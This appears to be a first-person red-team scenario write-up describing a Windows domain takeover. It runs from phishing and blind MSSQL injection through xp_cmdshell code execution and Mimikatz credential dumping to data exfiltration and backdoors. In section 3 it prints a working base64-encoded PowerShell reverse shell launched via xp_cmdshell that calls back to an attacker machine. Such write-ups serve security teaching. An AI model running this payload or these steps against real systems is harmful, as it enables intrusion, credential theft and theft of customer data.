# S1P1

**Scenario 1 - The Hidden Path to Domain Dominance**

**1. Initial Access:**

I began with a standard phishing attack, which led to compromising a single host within the corporate network. The host was domain-joined, and after successfully obtaining standard user credentials, I started my enumeration. During this phase, I ran common tools like `PowerView` and `BloodHound` to explore the domain environment.

There wasn't much of immediate value, but I noticed a running **SQL Server instance** on one of the machines. This piqued my interest, as SQL Server is a common place for misconfigurations or vulnerabilities to exist, especially when services like **SQL Server Authentication** are improperly configured.

**2. Discovering the MSSQL Injection Vulnerability:**

I decided to investigate the application that interacted with the SQL Server. It was a web application that had a search feature, and after inspecting its behavior, I noticed it was vulnerable to **SQL injection**. This was a blind injection, and while it didn’t initially leak sensitive data directly, I could tell it was interacting with the backend database in a way that could be exploited.

I spent some time exploiting this injection vulnerability to extract information about the database and its users. During my testing, I found a **Service Principal Name (SPN)** associated with a service account used by the MSSQL server—`MSSQLSvc/sqlserver.company.local`. This was an important lead because it meant that this service account could potentially have high privileges and be involved in domain operations.

**3. Exploiting SQL Server for RCE:**

Next, I found that the SQL Server instance was running with **elevated privileges**. It allowed for **xp\_cmdshell**, a built-in extended stored procedure, which can execute arbitrary OS commands from within SQL Server. With this, I was able to gain **Remote Code Execution (RCE)** on the server itself.

Using the SQL injection, I injected commands to execute the `xp_cmdshell` procedure and ran the following command to spawn a reverse shell:

{% code fullWidth="false" %}

```sql
EXEC xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAAxADMAMwA3ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==';
```

{% endcode %}

This reverse shell connected back to my attacker's machine, and I now had **SYSTEM-level access** to the server, with full control over the system running SQL Server.

**4. Privilege Escalation to Domain Admin:**

Now that I had RCE on the server, I explored the system further and found several credentials stored in memory and configuration files. Among these, I found **credentials for a highly privileged service account** used for SQL Server maintenance, which was part of the **domain administrators group**.

This account was configured with **delegation rights**, allowing it to impersonate higher-privileged users across the network. With this credential, I could access critical resources and escalate further.

**5. Accessing the Domain Controller and Full Compromise:**

Using the domain administrator credentials I obtained, I pivoted to the **domain controller**. I used tools like **Mimikatz** to dump the hashes and cleartext passwords for all domain accounts, including those of other administrators.

I then added my own account to the **Domain Admins** group, ensuring **persistent access** to the entire domain. With full control over the domain, I could access sensitive data across the network, perform lateral movements, and deploy persistence mechanisms.

**6. Exfiltration and Final Control:**

Now in full control of the domain, I exfiltrated sensitive data, including customer information and financial records. I also created additional backdoors to maintain access.

***

#### **Key Takeaways:**

* **MSSQL Injection**: A vulnerable SQL injection point in the web application allowed me to interact with the database and find the **Service Principal Name (SPN)** associated with SQL Server.
* **Remote Code Execution (RCE)**: By exploiting the `xp_cmdshell` feature of SQL Server, I gained **Remote Code Execution** on the server, providing SYSTEM access.
* **Privilege Escalation**: The compromised service account had elevated privileges and delegation rights, allowing me to impersonate domain admins and escalate to **full domain control**.
* **Domain Compromise**: Once I gained domain admin access, I had unrestricted access to all systems and sensitive data within the organization.